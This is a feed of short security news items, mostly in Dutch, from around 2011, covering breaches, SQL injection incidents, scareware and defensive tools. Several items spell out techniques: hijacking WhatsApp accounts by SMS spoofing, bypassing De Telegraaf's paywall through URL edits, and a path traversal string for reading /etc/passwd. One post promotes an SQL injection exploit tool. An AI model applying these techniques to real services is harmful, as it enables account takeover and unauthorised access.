    Bij het installeren van Whatsapp wordt de gebruiker gevraagd zijn mobiele nummer in te voeren om zo het account aan de mobiele telefoon te kunnen koppelen. Om dit te controleren wordt er vanaf de telefoon een controlebericht gestuurd. Als Whatsapp kan verifiëren dat het bericht is aangekomen, is de registratie voltooid.


    <\br> De tipgever ontdekte echter dat er een fout in die procedure zit die kan worden misbruikt. Als iemand namelijk geen beltegoed meer heeft en geen bereik heeft, dan wordt het sms-bericht niet verzonden. Dit bericht is echter wel bereikbaar op de telefoon. Door vervolgens het bericht via een online sms-dienst te versturen en daarbij het mobiele nummer van iemand anders als afzender te gebruiken, kan Whatsapp worden gekoppeld aan het account van een andere gebruiker.

    Diverse tweakers hebben inmiddels hun ervaringen op het forum gedeeld over deze hack en de werking ervan bevestigd. Een van deze gebruikers stelt dat de applicatie na het spoofen niet meer functioneert op de telefoon van de gespoofde gebruiker.

    Eerder al meldde beveiligingsonderzoeker ObAt aan Tweakers.net dat door op een netwerk het netwerkverkeer mee te lezen de berichten van Whatsapp onderschept kunnen worden en dat hierbij ook de gebruikersnaam en het wachtwoord te zien zijn. Hij kwam hier achter tijdens zijn onderzoek naar de dpi-praktijken van KPN. Tijdens diezelfde zoektocht ontdekte hij ook dat de website van Hi een beveiligingsfout bevatte.

     

    Bron: Tweakers.net

  • Hackers kunnen via software-aanvallen hardware permanent beschadigen, waardoor bedrijven langere tijd offline kunnen raken. Dat vertelde Itzik Kotler van Security Art tijdens de Hack in the Box conferentie in Amsterdam. "Veel mensen denken dat het niet kan, maar software kan hardware beschadigen", aldus Kotler. Zo is het mogelijk om de hardware schadelijke operaties uit te laten voeren of de software aan te vallen die de hardware gebruikt. Kotler spreekt van PDOS, wat voor Permanente Denial of Service staat.

    Voor de hand liggende aanvalsvectoren zijn het flashen van de firmware of microcode, het overklokken van geheugen of processoren en het overbelasten van de hardware. "De fan speelt een belangrijke rol bij het koelen van de computer. Dit is dan ook een aantrekkelijk doelwit." Er is verschillende software aanwezig om de fansnelheid te controleren. Door de fan uit te schakelen of te vertragen, zouden de onderdelen oververhit kunnen raken.

    Een andere aanvalsvector is het toedienen van een te hoog voltage, merkt Kotler op. Zowel processor als geheugen zijn hiervoor gevoelig. Daarvoor hoeft geen speciale software worden gemaakt, aangezien er tal van programma's zijn die dit kunnen. Het zou zelfs in een cyberoorlog gebruikt kunnen worden, laat de beveiliger weten. "Het is eenvoudig te doen. Je hoeft geen complexe rootkit te schrijven." Zo heeft Intel een programma voor het reguleren van de processor, maar ook het schrijven van een eigen programma om de CPU in een loop te krijgen is mogelijk.

    Firmware

  • Microsoft-WiFiOnderzoekers van Microsoft hebben een nieuw protocol bedacht dat gebruikers van draadloze netwerken en open hotspots tegen hackers en man-in-the-middle aanvallen moet beschermen. HTTPS kan dit soort aanvallen voorkomen, zijn er nog maar weinig websites die het gebruiken, mede vanwege kosten en prestaties, aldus de onderzoekers. Zo zijn HTTPS websites niet te cachen via CDN servers en cache proxies zonder dat dit invloed op de end-to-end beveiliging heeft. "Nu meer en meer webcontent cachebaar is, is HTTPS niet het volledige antwoord voor een end-to-end veilig web", aldus Kapil Singh.

    Caching
    De onderzoekers stellen dat alleen end-to-end authenticatie en integriteit vereist zijn voor de browser om de same-origin policy te handhaven. Zonder end-to-end vertrouwelijkheid is het mogelijk om de inhoud te cachen. "Gezien deze observatie, stellen we een nieuw protocol voor, HTTPi", laat Singh weten. HTTPi kan end-to-end authenticatie en integriteit verzorgen en ondersteunt bestaand webcaching oplossingen.

    Ook ondersteunt het content signing, iets wat offline gedaan kan worden. Daardoor zou HTTPi nauwelijks voor meer overhead dan normaal HTTP-verkeer zorgen. De onderzoekers stellen dan ook voor om HTTPS te gebruiken voor requests die end-to-end vertrouwelijkheid vereisen en HTTPi voor alle overige requests.

    "We zien HTTPi als aanvulling op HTTPS om end-to-end security naar het gehele web te brengen. Alleen wanneer er end-to-end security is, kunnen het web en de browser over een geheel veilig systeem beschikken", aldus de onderzoekers.
  • X-FactorHackers hebben de Amerikaanse tv-zender Fox in verlegenheid gebracht door in te breken op het netwerk en de database met aanmeldingen voor X-Factor te stelen. Een dump is inmiddels als download beschikbaar via torrentnetwerken.

    Naar nu blijkt heeft Fox eind vorige week al gewaarschuwd dat er mogelijk een hack was geweest waardoor de gegevens van tienduizenden X-Factor-kandidaten op straat zou kunnen liggen. Afgelopen weekeinde heeft de groep die verantwoordelijk claimt te zijn voor de aanval, de gegevens gepubliceerd via torrentnetwerken.

    De torrent, die iets meer dan 34MB groot is, bevat een MySQL-dump in zowel sql- als txt-formaat van de database met registratiegegevens van de kandidaten van de Amerikaanse versie van de tv-show X-Factor. Opvallend is dat de database, genaamd xfactorreg, op een intern ip-adres van Fox draaide. Dit impliceert dat de hackers niet rechtstreeks toegang hebben gehad tot de database, maar zich eerst op een andere manier toegang hebben verschaft tot de serversystemen van de zender.

    De database bevat gegevens van 73.726 kandidaten. Van deze mensen zijn naam, mailadres, geboortedatum, geslacht, postcode en mogelijk ook telefoonnummers opgenomen in de uitgelekte databasedump. De groep, genaamd LulzSec, zegt dat het laten uitlekken van deze database pas het begin is en dat 'er meer zal volgen'.

    Bron: Tweakers.net

  • Cybercriminelen hebben de zoekresultaten van Google "vergiftigd", waardoor gebruikers die foto's van de omgebrachte terroristenleider zoeken, naar websites worden doorgestuurd die nep-virusscanners proberen te installeren. Wie zoekt op de term "osama bin laden body", krijgt afbeeldingen die weer naar verschillende .cz.cc websites leiden. Deze pagina's proberen de “Best Antivirus 2011” scareware te installeren.

    Ook tijdens het huwelijk van de Britse prins William en Kate Middleton verschenen er tal van vergiftigde zoekresultaten. Volgens Fabio Assolini van Kaspersky Lab waren de 'bad guys' er dit keer erg snel bij.

    VLC plugin
    Inmiddels zijn er ook verschillende andere kwaadaardige websites verschenen waarop het nieuws van de dood van Bin Laden wordt gebracht, inclusief foto's. De websites tonen daarnaast een zwart vlak waar een video te zien zou moeten zijn. De bezoeker zou echter een vereiste VLC plugin missen. Het aangeboden XvidSetup.exe bestand is echter de bekende adware tool genaamd "Hotbar".
  • It's a good news for all ASP.NET developers. Microsoft has released v.4.0 of AntiXSS library. XSS is a type of website vulnerability and can be found in many websites. 
    The Microsoft Anti-Cross Site Scripting Library V4.0 (AntiXSS V4.0) is an encoding library. This library is designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique -- sometimes referred to as the principle of inclusions -- to provide protection against XSS attacks. This approach works by first defining a valid or allowable set of characters, and encodes anything outside this set (invalid characters or potential attacks). The white-listing approach provides several advantages over other encoding schemes. New features in this version of the Microsoft Anti-Cross Site Scripting Library include:- A customizable safe list for HTML and XML encoding- Performance improvements- Support for Medium Trust ASP.NET applications- HTML Named Entity Support- Invalid Unicode detection- Improved Surrogate Character Support for HTML and XML encoding- LDAP Encoding Improvements- application/x-www-form-urlencoded encoding support 

    Supported Operating Systems:Windows 7;Windows Server 2003;Windows Server 2008;Windows Vista;Windows XP
    OS: Microsoft WindowsSoftware: .NET Framework 3.5

    download here:
    http://www.microsoft.com/

  • firewallVoor wie zijn website of webapplicatie wil beschermen tegen misbruik, is een web application firewall (WAF) onontbeerlijk. Maar in de praktijk komt er heel wat kijken bij het inzetten van een WAF.

    Internetaanvallen zijn mettertijd meer van de netwerklaag naar de applicatielaag verschoven. Op het web kan een web application firewall (WAF) je helpen om deze aanvallen tegen te houden. Webwereld sprak met Erwin Geirnaert, oprichter en CEO van het Belgische beveiligingsbedrijf Zion Security, en Xavier Mertens, principal security consultant bij het Belgische beveiligingsbedrijf C-Cure. Beiden hebben ervaring met heel wat WAF's, waaronder ModSecurity, IronBee, Barracuda, Profense, BeeWare, F5 en Zion Secured (Zions eigen WAF).

    Een WAF kan heel wat typen aanvallen tegenhouden, waaronder SQL/LDAP/XML-injecties, cross-site scripting, session hijacking, path traversal (zoals het lezen van ../../../../etc/passwd), en brute-force aanvallen. Alles waarvoor signatures bestaan, is eenvoudig tegen te houden. Maar er bestaan ook WAF's die zelf leren wat het gevaarlijke verkeer is, waarna je de automatisch gegeneerde signatures nog kunt fine-tunen. Bovendien zorgt een WAF voor een grote toegevoegde waarde omdat alle inkomende en uitgaande HTTP-aanvragen kunnen worden gelogd, terwijl webapplicaties hier standaard niet voor instaan en een webserver alleen GET-requests logt en geen POST-requests.

  • Iphone_routeEen moderne iPhone stuurt twee keer per dag de locatiegegevens naar Apple, zo heeft een forensisch onderzoeker ontdekt. Alex Levinson ontdekte de gegevens in een cachebestand op de iPhone. De gegevens zijn niet voor andere applicaties toegankelijk, aangezien hier rootrechten voor nodig zijn. Het bestand wordt tijdens iPhone sync operaties naar pc of Mac gekopieerd en is dan wel bereikbaar.

    Beveiligingsonderzoekers Pete Warden en Alasdair Allan hebben nu een applicatie ontwikkeld die het bestand kan uitlezen en vervolgens de locatiegegevens op een kaart weergeeft. "Dit is vanuit een privacy oogpunt slecht. Autoriteiten zouden een gerechtelijk bevel kunnen krijgen om een forensisch onderzoek op je iPhone kunnen uitvoeren, om te zien waar je allemaal bent geweest", zegt Mikko Hypponen van het Finse anti-virusbedrijf F-Secure.
  • Hackers hebben toegang weten te krijgen tot de klantendatabase van het Duitse softwarebedrijf Ashampoo. Er zouden geen financiële gegevens van klanten zijn buitgemaakt, maar Ashampoo waarschuwt hen wel per e-mail.

    Volgens Ashampoo-directeur Rolf Hilchner hebben de hackers op een gekraakte server van het bedrijf namen en e-mailadressen van klanten buitgemaakt. Zij zouden echter geen financiële data zoals creditcardgegevens of bankrekeningnummers hebben ontvreemd, omdat deze informatie op servers van andere bedrijven staat.

    De firma claimt dat de hack snel werd ontdekt en dat het gat in de beveiliging vrijwel direct is gedicht. Ook zou Ashampoo aangifte hebben gedaan bij de Duitse politie. Het bedrijf waarschuwt zijn klanten in een e-mail dat de hackers de buitgemaakte data echter wel kunnen misbruiken.

    De hack van een server van Ashampoo is extra pijnlijk voor het bedrijf, omdat het een aantal beveiligingsproducten op de markt brengt, zoals Ashampoo Firewall Pro en Magical Security 2.

    bron: tweakers.net

  • Greetings All,

    After a very successfull release of Sql Poizon v1.0, The Exploit Scanner Tool, I am hereby introducing you with the new release which is more handy. It has new features as well as bug fixes from the older release. Please take a look for it below:

    New Features:
    "Look n Feel" is more attractive now.
    Rich "Context Menu" items.
    "Results" contain checkboxes to enable selection.
    "Selected Dork" box is editable now for user convenience.
    Built-in Browser for "Injection Builder" to check the impact of injection.
    "Text Bucket" available for "Injection Builder" to save extra data.
    "Insert Order By" button is added to "Injection Builder".
    "Internet Browser" with Snapshot and HTML DOM Tree.

    Bug Fixes:
    It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
    Progress bar for "Crawler" has been fixed. It will show correct progress now.
    Error on importing file is fixed now. You can import files from other directories as well.
    "Searchqu" shows invalid results. It is fixed now.

    Sql Poizon v1.1 - Sqli Exploit Scanner, Search Hunter, Injection Builder Tool

    sql_poizon_1
  • Een hacker heeft toegang gekregen tot een database van netwerk- en beveiligingsbedrijf Barracuda Networks, en heeft een dump van de database op het internet geplaatst. Onder andere wachtwoord-hashes en loginnamen zijn zichtbaar.

    De hacker gebruikte sql-injectie om de gegevens uit de database te halen en plaatste deze op het internet. Onder meer gegevens van werknemers en zakelijke partners zijn zichtbaar. Het gaat onder meer om ip-adressen, gebruikersnamen en hashes van wachtwoorden.

    Een wachtwoordhash is een versleutelde versie van een wachtwoord, waaruit het oorspronkelijke wachtwoord niet direct kan worden achterhaald. Door zogeheten rainbow tables aan te leggen kunnen hashes echter aan de bijbehorende wachtwoorden worden gekoppeld, zodat deze toch zijn te achterhalen.

    Volgens ComputerWorld had een door Barracuda zelf ontwikkelde firewall de server tegen dit soort aanvallen moeten beschermen, maar was die op het moment van de aanval offline voor onderhoud. Er zouden volgens Barracuda geen financiële gegevens in de database zijn opgeslagen. Sql-injectie is een vaak voorkomende aanval op het internet en laat hackers door een programmeerfout eigen opdrachten toevoegen aan sql-queries.

    bron: Tweakers.net

  • qubesDe eerste bètaversie van het superveilige besturingssysteem Qubes is online verschenen. Qubes is mede ontwikkeld door de Poolse rootkit-expert Joanna Rutkowska. Het is een opensource besturingssysteem gebaseerd op Xen, X Window System en Linux, en kan de meeste Linux programma's draaien en in de toekomst mogelijk ook Windows applicaties.


    Qubes implementeert een "security by isolation" aanpak, wat het doet door verschillende programma's via virtualisatie van elkaar te scheiden. Als één programma wordt aangevallen, heeft dit geen gevolgen voor de integriteit van de rest van het systeem.

    Virtual machines
    Eén van de belangrijkste onderdelen zijn de "disposable VMs", volgens Rutkowska een "killer feature". Het gaat hier om lichtgewicht virtual machines die binnen een seconde zijn gemaakt en gestart en als enig doel het hosten van één applicatie hebben, bijvoorbeeld een PDF-lezer of mediaspeler. In het geval van een PDF-bestand voorkomt dit de uitvoering van kwaadaardige code.

    Het 1,6GB grote besturingssysteem is via deze pagina te downloaden. De installatie werkt ook op een USB-stick. "In het geval je je laptop niet wilt 'opofferen'", merkt Rutkowska op. De finale versie van Qubes staat gepland voor na de zomervakantie.
  • Er blijken ruim 37.000 ssl-certificaten in omloop te zijn, die een gevaar kunnen vormen voor internetgebruikers. Het gaat om certificaten die gelden voor een locatie die niet uniek is, waardoor ze kunnen worden misbruikt voor hackaanvallen.

    De Amerikaanse digitale-burgerrechtenbeweging Electronic Frontier Foundation onderzocht hoeveel ssl-certificaten zijn verstrekt voor niet-unieke domeinen. Een uniek domein mag op het internet maar één keer voorkomen, terwijl een niet-uniek domein vaak wordt gebruikt voor intern netwerkverkeer. Zo kunnen verschillende netwerken een lokale host met de naam 'mail' hebben, terwijl het domein 'tweakers.net' op het internet maar één keer mag worden gebruikt.

    Volgens de EFF hebben certificaatautoriteiten vele duizenden keren certificaten verstrekt voor niet-unieke domeinen. Een certificaat voor het domein 'exchange' is 806 keer verstrekt, terwijl voor gerelateerde domeinen als 'exchange01' of 'exch' nog duizenden andere certificaten zijn uitgegeven. Exchange is een veelgebruikte zakelijke mailserver van Microsoft. Als verschillende partijen een ssl-certificaat voor hetzelfde domein hebben bemachtigd, is het certificaat nutteloos geworden.

    Bovendien veroorzaakt dit een groter risico op man in the middle-aanvallen, waarbij een aanvaller inbreekt in de communicatie tussen een gebruiker en een server. Een aanvaller kan bijvoorbeeld een interne dns-server hacken en het verkeer dat voor de host 'exchange' is bestemd naar een externe host laten doorsturen. Met een ssl-certificaat kan hij gebruikers een beveiligde verbinding met de server laten opbouwen, zodat zij niet doorhebben dat ze met een andere server te maken hebben.

    Opvallend is dat sommige certificaatautoriteiten, die zijn belast met het uitgeven van de ssl-certificaten, verschillende klanten een ssl-certificaat voor hetzelfde domein gaven. Volgens de EFF duidt dat erop dat de ca's niet controleren of certificaten wel geldig zijn. Al even opmerkelijk is dat er circa vijfduizend certificaten zijn uitgegeven voor het domein 'localhost', dat altijd verwijst naar het eigen systeem, waardoor de certificaten van weinig nut zijn.

    Ook ontdekte de EFF dat er certificaten in omloop zijn voor domeinen met niet-bestaande extensies, zoals '.farm', '.tech' en '.virtual'. Op dit moment zijn die certificaten weliswaar weinig bruikbaar, omdat de bijbehorende domeinnamen niet werken, maar de Icann werkt aan de mogelijkheid voor organisaties om zelf top-level-domeinen te registreren. Een bedrijf zou daardoor het '.tech'-domein kunnen claimen, terwijl daarvoor al ssl-certificaten zijn uitgegeven.

    Bron: tweakers.net

  • De betaalmuur die De Telegraaf om haar online krant heeft gebouwd, blijkt lek. De artikelen worden niet beschermd als iemand de url handmatig invoert.

    De betaalmuur van De Telegraaf doet haar werk niet goed. Bezoekers van de website kunnen artikelen in de digitale versie van het dagblad lezen zonder abonnement of eenmalige betaling. Zij moeten dan de originele afbeelding openen in hun browser. Dat meldt een tipgever die anoniem wil blijven.

    Artikel zoeken via broncode

    In de digitale versie van De Telegraaf krijgt ieder artikel een eigen nummer in de url. De pagina's zijn wel afgeschermd door het inlogmechanisme van de krant, de afbeelding niet.

    Advertenties in de digitale editie van het dagblad zijn niet beschermd door de betaalmuur. Door zo’n advertentie te openen is de structuur in de url van de artikelen eenvoudig te ontdekken. Uit JavaScript op de website blijkt dat die bij artikelen iets anders is. Het deel 'image_' moet verwijderd uit de directorynaam 'image_article' worden en het achtervoegsel '_large' bij een afbeelding moet gewijzigd worden in '_orig'.

    Automatisch met JavaScript

    Een korte blik op de bron van de webpagina waar de krantenpagina wordt getoond openbaart de nummers van de beschermde artikelen. Als het juiste nummer bij een artikel gevonden is, is het mogelijk om deze te lezen zonder eerst in te loggen.

    Onze tipgever laat weten dat het gratis lezen van artikelen in De Telegraaf ook eenvoudiger kan. Met behulp van een bookmarklet met een eenvoudige JavaScript code is het volgens hem mogelijk om artikelen te lezen zonder in de broncode van de pagina te duiken. Webwereld kan zijn manier niet reproduceren maar onze tipgever laat weten dat het probleem desalniettemin niet is gedicht.

    Bij De Telegraaf was vanmiddag niemand aanwezig voor een reactie. Wel is de bug in de betaalmuur van het dagblad inmiddels een week geleden gemeld aan de krant.

    Niet de eerste krant

    De Telegraaf is niet de enige krant met een zwakke betaalmuur. Zo waren de iPad-versies van NRC Handelsblad, nrc.next, het Reformatorisch Dagblad èn De Telegraaf eenvoudig zonder te betalen te lezen door onbeveiligde opslag. De betaalmuur van de New York Times is te omzeilen door de URL te wijzigen.

    Bron: Webwereld.nl

  • De 21-jarige Iraanse student die succesvol bij partners van Certificaat Authority Comodo wist in te breken, heeft de database van GlobalTrust en InstantSSL online gezet. De student, die zichzelf de Comodo-hacker noemde, wist in naam van Google, Microsoft, Mozilla, Skype en Yahoo SSL-certificaten aan te vragen. Eerder gaf de student al uitleg van de hack, maar nu heeft hij via klokkenluidersite Cryptome ook twee .bak bestanden online geplaatst. Het zou gaan om de database van Globaltrust en het CMS van InstantSSL Italië, aldus de hacker via Twitter.

    Vanwege de eerste aanval werden verschillende GlobalTrust websites uit de lucht gehaald. GlobalTrust.it is nog steeds online, maar InstantSSL.it is weer offline gehaald. "Mogelijk als bescherming tegen aanvallen die het resultaat van dit nieuwste lek zijn", zegt Paul Mutton van Netcraft.
  • adobeHet aantal gerapporteerde beveiligingslekken in Google Chrome, Adobe Reader en Adobe Flash Player steeg het afgelopen jaar explosief, zo blijkt uit cijfers van het Deense Secunia. Mozilla en Microsoft wisten daarentegen het aantal kwetsbaarheden terug te dringen. Zo verhielp Google de afgelopen twaalf maanden 139 Chrome-lekken, terwijl dat een jaar eerder er nog 52 waren. Een stijging van 167%.

    Ook Adobe zag het aantal kwetsbaarheden groeien. Adobe Flash Player had de afgelopen twaalf maanden met 68 lekken te maken, terwijl dat in dezelfde periode een jaar eerder er nog 21 waren. Een stijging van 224%. In het geval van Adobe Reader waren de cijfers niet veel beter. 150 lekken tegenover 58 lekken een jaar eerder, wat een 159% groei betekende.

    Internet Explorer zag het aantal kwetsbaarheden juist afnemen, van 54 naar 34, wat een daling van 37% is. Mozilla deed het met 81 lekken vorig jaar ten opzichte van 106 twaalf maanden eerder, afname van 24%, ook niet onverdienstelijk.
  • Een beveiligingslek in een database van de firma Epsilon, waarin e-mailadressen van miljoenen Amerikanen staan opgeslagen, blijkt nog groter dan gedacht. Een onbekende hacker zou de mailadressen hebben buitgemaakt.

    Afgelopen vrijdag werd bekend dat de maildatabase van de Amerikaanse marketingfirma Epsilon was gekraakt. In deze database staan e-mailadressen en namen van miljoenen Amerikanen opgeslagen. Aanvankelijk leken alleen de mailadressen van de supermarktketen Kroger door de hackers bemachtigd te zijn.

    In het weekeinde is echter duidelijk geworden dat de aanvallers mailadressen van nog veel meer Amerikaanse bedrijven die gebruikmaken van de diensten van Epsilon zijn buitgemaakt. Onder hen zijn de gegevens van klanten van Best Buy, TiVo, JPMorgan Chase & Co, Citigroup en Home Shopping Network. Naast e-mailadressen zouden in enkele gevallen ook andere klantgegevens zijn buitgemaakt.

    Epsilon, een firma die jaarlijks 40 miljard e-mails verstuurt en meer dan 2500 bedrijven als klant heeft, stelt dat het een onderzoek heeft ingesteld naar het lekken van klantgegevens uit zijn database. Er zouden geen creditcardgegevens of inloggegevens zijn bemachtigd. Beveiligingsonderzoekers vrezen echter dat door het lekken van miljoenen e-mailadressen en namen kan leiden tot een vloedgolf aan spam en phishing-aanvallen.

    Epsilon heeft zijn klanten zelf op de hoogte gesteld van het lek, zo blijkt uit een verklaring van Best Buy. Ook TiVo is door het mailbedrijf gewaarschuwd. Epsilon stelt dat er geen creditcardgegevens zijn buitgemaakt en dat de schade beperkt is gebleven tot mailadressen en voornamen.

    Bron: Tweakers.net

  • Een groot aantal websites is geïnfecteerd met javascript-code die bezoekers doorstuurt naar een pagina waar namaak-antivirussoftware wordt aangeboden. Waarschijnlijk gebruiken de aanvallers sql-injection om de code te plaatsen.

    De aanval kwam dinsdag voor het eerst aan het licht en inmiddels is de javascript-code op een groot aantal websites geplaatst. Uit een Google-zoekopdracht valt af te leiden dat 3,8 miljoen url's zijn besmet met malafide javascript-code. Waarschijnlijk wordt de code met sql-injectie aan pagina's toegevoegd, meldt Websense. De blog heeft tot nu toe enkel meldingen gehad van infecties op sites die Microsoft SQL Server 2000 of 2005 gebruiken.

    De geïnjecteerde javascript-code stuurt gebruikers door naar een advertentiepagina voor scareware: malware die zichzelf voordoet als legitieme beveiligingssoftware. Vaak wordt de software aangeboden met advertenties die gebruikers bijvoorbeeld een gratis virusscan aanbieden, omdat hun computer zogenaamd gevaar loopt. Het gaat in dit geval om Windows Stability Center, dat na installatie gebruikers wil doen geloven dat hun computer is geïnfecteerd met allerlei virussen. Vervolgens wil de software gebruikers ertoe verleiden om namaaksoftware aan te schaffen.

    Windows Stability Center lijkt redelijk nieuw te zijn en komt nog niet voor in de databases van antivirusbedrijven. Het is niet bekend of de software ook gegevens buit maakt en of geïnfecteerde pc's worden gebruikt om in een botnet websites aan te vallen. Het is eveneens onduidelijk hoeveel websites zijn besmet; enkel het aantal verschillende url's waarop het script voorkomt, kan worden geschat.

    Onder de besmette url's zijn naar schatting 8000 Nederlandse sites. Daaronder valt ook een faq-pagina van de virtuele provider Simyo, waar de code is geïnjecteerd in de keuzeopties van een selectieveld. Hierbij zijn de '<'- en '>'-karakters echter omgezet naar html-entiteiten, waardoor de geïnjecteerde tekst niet als code wordt herkend en dus niet wordt gerenderd. Iets vergelijkbaars gebeurde volgens Websense op pagina's op itunes.apple.com, waar eveneens code werd geïnjecteerd, maar niet door browsers werd uitgevoerd.

    Windowsstabilitycenter

    Bron:   tweakers.net

  • mcafeeEen hacker heeft meerdere Cross site scripting (XSS) kwetsbaarheden en Information discloser kwetbaarhede op de McAfee website ontdekt. De ethische hacker behoort tot YGN ethische hackers groep. De groep vond deze kwetsbaarheden op 12 februari van dit jaar. Op 27 maart waren kwetsbaarheden nog niet opgelost. Vandaar dat de groep besloot om deze kwetbaarheden openbaar te maken.
    Het COSS-site scripting lek zou aanvallers toegestaan ​​aanvallers in staat stellen om het merk McAfee te schaden. Aangezien McAfee een betrouwbare leverancier van antivirussoftware is, zou de impact van de aanval aanzienlijk zijn!

    De informatio disclosure flaws zouden ​​toegang tot de broncode van de site code kunnen geven. Dit met alle gevolgen van dien.

    Deze kwetsbaarheden kunnen eenvoudige worden verhopen, maar desondanks heeft McAfee dit nog niet gedaan

  • mysqlHackers zijn erin geslaagd om via een gat in de beveiliging van de MySQL-website een dump van de database te maken door gebruik te maken van sql-injectie. De MySQL-databasesoftware wordt door veel websites gebruikt.

     

    Dumps van de database van MySQL.com verschenen op de Full Disclosure-mailinglijst en op Pastebin, waarbij onder meer de structuur van de database zichtbaar was, evenals namen, wachtwoordhashes en e-mailadressen van gebruikers. Van sommige gebruikers was ook het daadwerkelijke wachtwoord zichtbaar, dat waarschijnlijk dankzij gebruik van rainbow tables werd achterhaald. Opvallend is dat een hoge manager bij MySQL, Robin Schumacher, een wachtwoord van slechts vier cijfers had.

    De hackers ontfutselden de informatie met behulp van sql-injectie, waarbij aan database-requests eigen sql-code wordt toegevoegd door bepaalde parameters te manipuleren. Daardoor kan informatie worden opgevraagd of gewijzigd. Sql-injectie is te voorkomen door bepaalde karakters te strippen uit variabelen die door gebruikers worden ingevuld, bijvoorbeeld de inhoud van formulieren. MySQL heeft daarvoor een speciale functie, die het op zijn eigen website mogelijk niet overal gebruikte.

    Het is onduidelijk tot welke databases de hackers toegang hadden, maar de mogelijkheid om een dump van een aanzienlijk deel van de database te maken, wijst erop dat de misbruikte mysql-query op redelijk hoog niveau met de database communiceerde. Zondag werd bekend dat ook de website van Sun vatbaar was voor sql-injectie. Daarbij kon een minder groot deel van de database worden opgevraagd, maar er waren wel onder meer e-mailadressen zichtbaar.

    bron: tweakers.net

  • pwn2ownEen security-onderzoeker die voor Google werkt heeft een fuzzingtool gepubliceerd waarmee hij al honderd browserlekken heeft gevonden.

    Onderzoeker Michal Zalewski heeft op 1 januari zijn fuzzertool voor webbrowsers, genaamd cross_fuzz, gepubliceerd. Hij omschrijft het programma als 'verbazingwekkend effectief' in het laten crashen van browsers. Met de tool heeft hij al 100 browserbugs weten te vinden, waarvan de meeste zijn te misbruiken. Zalewski heeft ook meer informatie over het exacte algoritme van de fuzzer gepubliceerd.

    Fuzzing is een manier van testen waarbij willekeurige inputs worden toegepast. Doel is om onverwachte situaties te creëren om te zien hoe het programma hierop reageert.

  • adobeAdobe heeft een noodpatch voor een ernstig beveiligingslek in Flash Player en Reader uitgebracht, dat aanvallers op het moment actief misbruiken. Via de kwetsbaarheid wisten mogelijk Chinese aanvallers toegang tot vertrouwelijke systemen te krijgen. Voor de aanval verstopten de aanvallers een kwaadaardig Flash-bestand in een Microsoft Excel-bestand, dat via e-mail werd verstuurd.

    Gebruikers van Flash Player krijgen het advies om naar versie 10.2.153.1 te upgraden. Voor Android smartphones is versie 10.2.156.12 uitgekomen. Eerder patchte Google al de ingebouwde Flash Player in de Chrome browser. Het updaten gebeurt daar geheel automatisch. Verder is er ook een update voor Adobe AIR uitgekomen, gebruikers krijgen het advies versie 2.6 te installeren.
  • Facebook-logoBeveiligingsspecialisten waarschuwen voor een phishing-aanval op Facebook-gebruikers. Hackers gebruiken daarvoor een iframe in een Facebook-applicatie. Nederlandse sites zijn onderdeel van de aanval.

    Hackers hebben een nieuwe manier gevonden om inloggegevens van Facebook-gebruikers te stelen. Dat meldt beveiligingsbedrijf M86. De phishers gebruiken daarbij de e-maildienst van Facebook als lokkertje. Via een statusupdate van een, al gehackte, bekende roepen de phishers gebruikers op om hun maildres bij Facebook te claimen voordat die door een ander wordt ingepikt.

    Onder dat bericht staat een verkorte url die doorverwijst naar een Facebook-applicatie.

  • php2De PHP wiki-website is slachtoffer geworden van een hackersaanval door een kwetsbaarheid in de wiki-software en een Linux-exploit. De ontwikkelaars stellen echter dat er niet is gerommeld met de broncode van de veelgebruikte scripttaal.

    De aanval op Php.net zou zijn uitgevoerd door een kwetsbaarheid in de wiki-software te misbruiken in combinatie met een Linux root-exploit. Volgens de beheerders van de website zijn er accounts van gebruikers van de Wiki-site buitgemaakt.

    Uit een eerste analyse van de gevolgen van de aanval zou zijn gebleken dat de hackers geen veranderingen hebben aangebracht in de broncode van php 5.3.5 door via svn wijzigingen voor te stellen. Ook zouden de aanvallers geen andere servers van Php.net hebben weten te kraken.

    Uit voorzorg dienen alle gebruikers van Php.net hun wachtwoord te veranderen. Daarnaast is de inhoud van de gekraakte server gewist.

    bron: tweakers.net

  • symbian_osOnderzoekers hebben een nieuw Trojaans paard ontdekt dat mobiele TAN-codes van Symbian smartphones probeert te stelen. Volgens het Finse F-Secure is het opmerkelijk dat deze Man-in-the-mobile (Mitmo) een component van de SpyeEye Trojan is, terwijl eerdere Mitmo malware op de Zeus Trojan was gebaseerd. Het ging onder andere om aanvallen op Spaanse en Poolse mobiele internetbankierders.

    De mobiele Trojan werd een aantal weken geleden in Europa ontdekt. Welke banken het doelwit zijn wil Sean Sullivan van F-Secure niet zeggen. Wel laat hij weten dat de malware het certificaat van een Chinese ontwikkelaar gebruikt om de vereiste van Symbian voor gesigneerde code te omzeilen.

  • rsaBeveiligingsbedrijf RSA Security, dat onder meer SecurID-sleutel generators verkoopt, heeft aangegeven dat hackers erin zijn geslaagd om informatie te stelen over de werking van de sleutelgenerators. De veiligheid daarvan zou aangetast zijn.

    Het beveiligingsbedrijf zegt nog te onderzoeken welke gevolgen de diefstal van de gegevens heeft en werkt samen met afnemers van de SecurID-producten. De SecurID-apparatuur wordt gebruikt om elke dertig seconden een nieuwe rsa-sleutel te genereren, die middels een tweetraps-authenticatieproces voor beveiligde internetverbindingen moet zorgen. De codes kunnen ook door middel van een softwareprogramma worden gegenereerd. RSA Security, een dochteronderneming van EMC, heeft ten minste 40 miljoen hardwarematige en 250 miljoen softwarematige SecurID-producten in omloop.

    RSA Security heeft een open brief op zijn website gepubliceerd waarin het schrijft dat de gegevensdiefstal geen directe gevolgen heeft voor de SecurID-beveiliging, maar wel het beveiligingsniveau kan ondermijnen. Andere RSA-producten zouden niet getroffen

    zijn door de aanval en er zou geen privacygevoelige informatie zijn buitgemaakt.

    RSA Security onderzoekt de precieze toedracht van de hack nog, maar geeft aan dat de aanval 'bijzonder geavanceerd' was. De hackers zouden gericht op zoek geweest zijn naar informatie over rsa-beveiliging, wat volgens het bedrijf duidt op een zogeheten advanced persistent threat-aanval. Details over wanneer de hackers zijn binnengedrongen en hoe lang zij toegang tot de systemen hadden, geeft RSA Security niet. Wel worden de betrokken klanten geïnformeerd.

